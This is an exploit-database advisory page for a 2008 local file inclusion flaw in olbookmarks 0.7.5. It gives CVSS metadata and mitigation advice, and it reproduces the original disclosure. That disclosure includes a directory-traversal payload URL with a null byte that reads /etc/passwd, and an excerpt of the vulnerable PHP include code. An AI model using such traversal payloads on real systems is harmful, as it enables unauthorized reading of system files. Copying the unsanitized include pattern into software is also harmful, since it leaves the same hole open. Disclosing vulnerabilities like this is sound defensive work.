olbookmarks - exploit.company

vendor:

olbookmarks

by:

dun

8.8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: olbookmarks

Affected Version From: 2000.7.5

Affected Version To: 2000.7.5

Patch Exists: YES

Related CWE: N/A

CPE: a:olbookmarks:olbookmarks

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

olbookmarks <= 0.7.5 Local File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'show' parameter to '/olbookmarks-0.7.5/show.php'. This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded NULL bytes.

Mitigation:

Upgrade to the latest version of olbookmarks.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ####################################################################
 #  [ olbookmarks <= 0.7.5 ]   Local File Inclusion Vulnerability   #
 ####################################################################
 #
 # Script site: http://sourceforge.net/project/showfiles.php?group_id=24742
 #
 # Vuln: 
 # http://site.com/olbookmarks/show.php?show=../../../../../../../etc/passwd%00
 #      
 #
 # Bug: ./olbookmarks-0.7.5/show.php
 #
 # ...
 #	if ($_REQUEST[root] != "" || $_REQUEST[lib] != "") exit;
 #
 #	if ($_GET[show]!="")
 #		include("$root/$_GET[show].php");
 #	else
 #		include("$lib/bookmarkslist_view.php");
 # ... 			    
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-23]